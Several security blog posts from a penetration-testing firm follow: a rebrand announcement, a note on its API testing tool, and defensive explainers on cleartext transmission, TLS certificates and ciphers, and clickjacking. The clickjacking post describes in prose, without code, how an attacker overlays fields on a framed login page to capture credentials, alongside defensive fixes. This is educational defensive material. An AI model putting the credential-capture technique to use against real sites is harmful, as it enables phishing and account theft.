It’s official: Raxis has a new logo, a new look, and a new website that better represents the full range of services we offer. We’re excited about the rollout and thought it might be a good idea to explain the story behind the look.
Raxis CEO Mark Puckett launched our company in 2011 because he saw a glaring need for penetration testing that was more than just a checkbox exercise. Corporations needed to be challenged by innovative and relentless professionals who color outside the lines just like the bad guys. In the years since, we’ve established an incredible track record for successfully hacking into networks protected by some of the most advanced and sophisticated security available.
For the most part, our mission has been our marketing. Companies that have used our services are often amazed at how rapidly we can breach their defenses. Word spread quickly that your system hasn’t been tested until it’s been Raxis-tested. Our website and marketing materials, though effective, were secondary. As we take the company to the next level, however, we decided our brand needs to more accurately represent who we are and what (all) we do.
As you visit the new Raxis.com, here are some cool things to look for:
Yin and Yang: Notice the juxtaposition of red and blue, representing the two prominent aspects of our business. Red for attack. Blue for defense. It’s based on a martial arts principle – “The hand that strikes also blocks.”
The X-Factor: Take a close look at the ‘x’ in Raxis and you’ll see it’s the intersection of red and blue arrows. Red is dominant because all of our services are born from and based on our unrivaled attack skills.
The Color Purple: Most of our services fit pretty neatly into the attack or protect categories, but some are specialized or a mixture of the two. If you guessed that we created a new purple category for those, give yourself a pat on the back.
Tongue Meets Cheek: It’s hard to say if we have a lot of fun because we’re so good at our jobs – or if we’re that good because we have so much fun. Either way, we wanted our website to ‘sound’ like us, so, as you scroll through, notice that there’s a little lighter tone to much of our language. We take our jobs seriously, but we don’t peddle fear.
4-0-Funny: As is always the case with a new website, we may lose or misname a link somewhere along the way. If that happens, wait a second and you’ll at least get a little entertainment for your trouble.
We hope you find the new site helpful, informative, and even entertaining. But if you find a mistake or a broken link, please let us know.
At Raxis we perform several API penetration tests each year. Our lead developer, Adam Fernandez, has developed a tool to use for testing JSON-based REST APIs, and we’re sharing this tool on GitHub to help API developers test their own code during the SDLC process and to prepare for third-party API penetration tests.This code does not work on its own… it’s a base that API developers can customize specifically for their code. You can find the tool at https://github.com/RaxisInc/api-tool.
Here’s a basic overview of the tool from Adam himself:
The Raxis API tool is a simple Node.js class built for assessing API endpoints. The class is designed to be fully extensible and modifiable to support many different types of JSON-based REST APIs. It automatically handles token-based authentication, proxies requests, and exposes several functions designed to make it easier and faster to write a wrapper around an API and associated test code for the purposes of a penetration test. This tool is not designed to work on its own, but to serve as a building block and quickstart for code-based API penetration testing.
Ask any penetration tester at Raxis, and they’ll tell you that we see insecure transmission of private data, often in the form of usernames and passwords, on many of the web application and external penetration tests we perform. There are a number of easily discoverable issues in play that can assist an attacker in gaining access to private information and internal systems. These vulnerabilities are a part of A3-Sensitive Data Exposure in OWASP’s 2017 Top 10 list.
Encrypting Data in Transit
Say you’re on a public Wi-Fi network at a coffee shop or a hotel, or even a private network that’s been compromised in a previous attack. An attacker on the same network can sniff traffic as it’s sent across the network or even outside of the network to the Internet. This is called a Man in the Middle (MitM) attack. Users on the network have no way to know that an attacker is monitoring their network traffic in this way.
To mimic a MitM attack, I used Wireshark to capture the network traffic from my own computer. First, I logged in to a website that does not use encryption. This site uses HTTP to send the credentials in cleartext, which you can see listed in the captured POST request below:
Now, let’s see what happens when I submit my credentials over an encrypted HTTPS connection:
Even though I can sniff all network traffic between my computer and the website, I can not read the data itself. Private data such as user credentials, session tokens, and credit card numbers should always be encrypted in transit using HTTPS to protect users from man in the middle attacks.
Encoding is Not Encryption
We often run into websites that use Base64 or another form of encoding to protect data. It’s important to note that while encoding can be used to protect data from accidental manipulation or to make data easier to send and store, it does not offer any additional security than if the encoded data was to be left in cleartext. The fundamental difference between encoding and encryption is that while encoding is intentionally designed to be performed without the use of a key or secret, encryption is designed to protect the data from being accessed without such a key or secret.
In the example below, I used a free base64 decoding website to decode a base64 value. Feel free to use this website to see how easily you can decode this base64-encoded value:
RHJpbmsgWW91ciBPdmFsdGluZQ==
SSL Certificates
Now that you understand that sending private data in cleartext (or base64) is a bad idea and you’ve decided to use HTTPS for your site, you still need a valid SSL certificate before your site is secure. Without a valid SSL certificate, browsers will warn that your site is not secure as my browser did for this Nessus site that I run on my computer.
While errors like this can be acceptable on a private computer where I know what the site is and where I’m running it, it is not acceptable for an external website or an internal corporate network. An attacker trying to trick you into using a malicious site might use an invalid certificate such as the one above to trick you into using their site. Without a valid certificate, you cannot be sure whether the site is genuine and safe or not.
As a comparison, here is a site that uses a valid SSL certificate. The browser checks the certificate and validates that it’s secure.
The browser also allows you to view the certificate yourself, should you want more detailed information about the issuer, subject, or public key. You can view all the details of why the browser declares the certificate as secure.
It’s issued by a trusted Certificate Authority (CA), in this case a free CA called Let’s Encrypt
It hasn’t expired yet
It uses a strong encryption algorithm for the public key
This brings up a few common issues we see that make certificates insecure:
The certificate is expired. Many companies don’t have a master list of certificates and their expiration dates, which can lead to forgotten certificates that don’t get replaced until a penetration test or customer complaint highlights the issue.
The certificates is for the wrong website. Occasionally, companies many forward domain names to the server that uses the certificate or change existing ones without updating the certificate itself. Since the certificate wasn’t issued for the additional or modified domains, it is not a valid certificate for those domains.
The certificate is self-signed. While it’s generally okay to self-sign certificates for fully internal sites provided the signing authority has been added to the trusted certificate store for all devices on the network, all external-facing sites should use an SSL certificate signed by a trusted Certificate Authority (CA).
The dangers with untrusted self-signed certificates are:
An attacker could create their own self-signed certificate that looks nearly identical to the legitimate one.
Many users will refuse to use the site because of the security errors browsers will show.
Users who are willing to use the site will become accustomed to using sites with certificate errors, making them more likely to ignore these errors on a malicious site.
Encryption Ciphers and Protocols
Now that your webpages are being served over HTTPS with a valid certificate, let’s think about the strength of the encryption itself. Think of Julius Caesar using the now famous Caesar Cipher to encrypt secret military messages. Centuries later, it’s best not to use that cipher because it was cracked and is now common knowledge. If you’re interested in the history of encryption, Simon Singh’s The Code Book is a great read.
For the purposes of securing a website, we need to use complex encryption protocols and ciphers. Because attackers are always looking for flaws in these protections, we must always keep one step ahead and be sure to avoid using any weaker ciphers or protocols. SSLScan is a free tool that runs on Linux, Windows and macOS. Here is an SSLScan for https://raxis.com/. For a free online tool that can assess the ciphers and protocols on external facing sites, check out Qualys’ SSL Server Test. SSLScan shows all protocols and ciphers that the site accepts. Weak protocols and ciphers, if they were enabled for the site, would be listed in yellow or red.
Two types of protocols are commonly used: SSL (Secure Sockets Layer) and TLS (Transport Layer Security). All versions of SSL have been compromised and should not be used. There are multiple known exploits that attackers can use to gain access to your data or cause a denial of service attack if the data is transmitted using SSL. At the time of writing, the recommended protocol is TLSv1.2, although TLSv1.1 can be secure if configured correctly. TLSv1.3 is currently being drafted, so be sure to keep an eye out for that in the future. We always recommend removing weak protocols, such as SSLv2, SSLv3, and TLSv1.0, because SSL/TLS implementations support a downgrade process that allows an attacker to bypass a server’s secure protocols in favor of less secure protocols.
Each protocol provides many cipher suites, some more secure than others. Weak ciphers must be explicitly disabled on the server to ensure that cryptographically strong ciphers are used when transmitting private data. In the example above, https://raxis.com/ only uses strong ciphers and protocols.
What Web Developers Can Do to Protect Their Sites
There are a number of things that web developers and administrators can do to keep their sites secure and their users safe.
Ensure that all private data, including credentials, session tokens, credit cards, medical data, and so on are encrypted in transit by enforcing the use of HTTPS.
All resources on a page must be encrypted for the page to be considered secure. This means that graphics, scripts, and other behind-the-scenes files should be served over HTTPS as well.
Use only certificates issued by a trusted Certificate Authority (CA).
Replace certificates before they expire. Keep track of your company’s certificates using a tool, such as Venafi’s TLS Protect. This tool can even automatically replace expiring certificates.
Use the TLSv1.2 protocol and disable older protocols where possible. If your site needs to support browser versions released prior to 2013, enable TLSv1.1, as these older versions do not support TLSv1.2. See Can I Use to see which browsers supports support TLSv1.2.
Disable weak ciphers within your protocols’ cipher suites. Test thoroughly before making changes in production to ensure that your site doesn’t have outages. OWASP’s Transport Layer Protection Cheat Sheet is a great resource.
Annual penetration tests can help you your web applications and external network continue to provide strong encryption to your users. Raxis’ Baseline Security Assessment can also help you keep a monthly watch for any issues.
What Users Can Do to Protect Themselves
While it’s up to website administrators to keep websites secure, users of these sites can keep themselves safe by being vigilant. Watch your browser. Never enter private data such as passwords, credit card numbers, and medical information if the website you’re using:
Starts with http://
Starts with https:// but shows a security error
Close your browser if you see a security error when you are already logged in. Your private data could be sniffed by an attacker every time you submit a form or click a link.
When on public Wi-Fi, such as free Wi-Fi offered in hotels or restaurants, use a VPN such as privateinternetaccess to ensure your private information is encrypted in transit.
Many of the external network and web application penetration tests that we perform list ‘clickjacking’ as a vulnerability. We find that many website developers, as well as many users, do not fully understand what clickjacking is. While clickjacking is not exploitable to gain system access on its own, this web configuration vulnerability can be used to gather valid credentials that can lead to system access when paired with a social engineering attack such as phishing. Clickjacking falls under the A6 – Security Misconfiguration item in OWASP’s 2017 Top 10 list.
A LOOK AT HOW IT WORKS
Clickjacking uses a genuine webpage, usually a login page, to trick users into entering private information such as credentials. To show how this works, we created a sample login page for a great little app called Not a Secure Site.
As the page does not implement clickjacking protections, an attacker can quickly and easily clone the page by placing it within an HTML iframe on their own website. By overlaying their own username, password, and sign in button elements on a layer above the iframe, the attacker can capture any credentials the user believes they are entering into the original login form. The example below shows how the attacker’s cloned page might look. Can you tell the difference between the real site and this malicious site?
Without inspecting the source code of the malicious page, the content of the page appears identical to the legitimate one. Now, let’s highlight the overlaid text fields and button fields in blue so we can see where the magic takes place:
Those fields are in a layer of HTML that is physically sitting on top of the iframe containing the Not a Secure Site’s log in page. When an unsuspecting user enters their credentials on this page, they are entering them in the attacker’s text fields and clicking the attacker’s button.Let’s add a border around the iframe on the attacker’s website:
Here we can clearly see where the attacker has embedded Not a Secure Site’s log in page into the malicious site.Using Burp Intercept, we can watch the HTTP Request. For this example, I just set the attacker’s form to POST to the Raxis website. In the intercepted request below, we can see that the user’s credentials entered into the form are being sent to the attacker’s site instead of to Not a Secure Site.
This is all very clever, but it doesn’t mean a thing if a user never enters credentials. This type of attack must be used as part of a larger attack, which is generally a phishing attack that encourages the target to click on a URL in an email.The HTML code on the malicious page can be remarkably simple. The attacker needs only to create and properly position text fields and a button on the page, and the iframe does the rest!
In more advanced clickjacking attacks, an attacker can log your credentials as you type them, capturing your username and password before you even submit the form.
WHAT WEB DEVELOPERS CAN DO TO PROTECT THEIR SITES
So, what makes this webpage vulnerable and what could the website’s developer do differently to fix it? It all comes down to preventing the page from being embedded in the iframe. Modern browsers look for the X-Frame-Options header to determine when an external site is permitted to be presented in an iframe. Looking at the HTTP response for Not a Secure Site’s log in page, we see that the site does not set the X-Frame-Options header, which defaults to allowing any site to be embedded in an iframe.
The X-Frame-Options header can be set dynamically in server-side code or configured on a global level through the web server or proxy configuration. The X-Frame-Options header allows three possible values:
DENY
SAMEORIGIN
ALLOW-FROM uri
If the website never needs to be embedded in an iframe, the developer should use the DENY value to block all iframes. Here’s what the attacker’s website looks like when Not a Secure Site has set the X-Frame-Options response header for the entire website to DENY. The header prevents the login page from rendering within the iframe.
The SAMEORIGIN value can be set if the webpage needs to be within an iframe on its own site. The ALLOW-FROM uri value is not recommended because it’s not supported by all browsers.While the X-Frame-Options header is the best defense against clickjacking attacks, the Content-Security-Policy directive can use the frame-ancestors property to restrict which domains are allowed to place the website in a frame, though frame-ancestors is not yet supported in all major browsers.OWASP has a great Clickjacking Defense Cheat Sheet explaining these options in detail, as well as explaining old methods that will not work well and are not advised. The OWASP Secure Headers Project is another great tool that you might want to check out.Raxis offers several penetration tests that alert customers to websites that are vulnerable to clickjacking. Check out our Web Application Penetration Testing service to get a start. If a full penetration test is not within your company’s needs or budget, take a look at our Baseline Security Assessment option, which also highlights clickjacking vulnerabilities.It’s important to note that some phishing attacks will copy webpage code, instead of embedding the page in an iframe, to achieve the same results. Depending on the webpage, this can be complicated and may require an advanced knowledge of HTML, JavaScript, and CSS. When an attacker is able to produce a convincing clone of a website without using an iframe, any form of clickjacking protection, including X-Frame-Options, cannot prevent this form of attack.
WHAT USERS CAN DO TO PROTECT THEMSELVES
Clickjacking recommendations are often focused on what web developers and website administrators can do to protect users, but what can you as a user?Keep in mind that the attacker has to trick you into using their website. Whether they do this through an email, a flyer, a poster on a wall, or casually mentioning it in a conversation, it’s always a good idea to verify that the link you are using is legitimate. If you’re at work, check with your IT department; if you’re a user of a consumer site, go to the genuine site and use the contact form or the phone number there to verify the link.Remember that links can be masked to look like something else. Hover over links in emails and webpages to see what URL they truly point to. Look at URLs carefully to see if they are legitimate. Attackers will often buy domain names that look a lot like the true website’s domain in the hopes that their targets will not look closely.See our recent phishing blog post to learn more about protecting yourself from phishing attacks.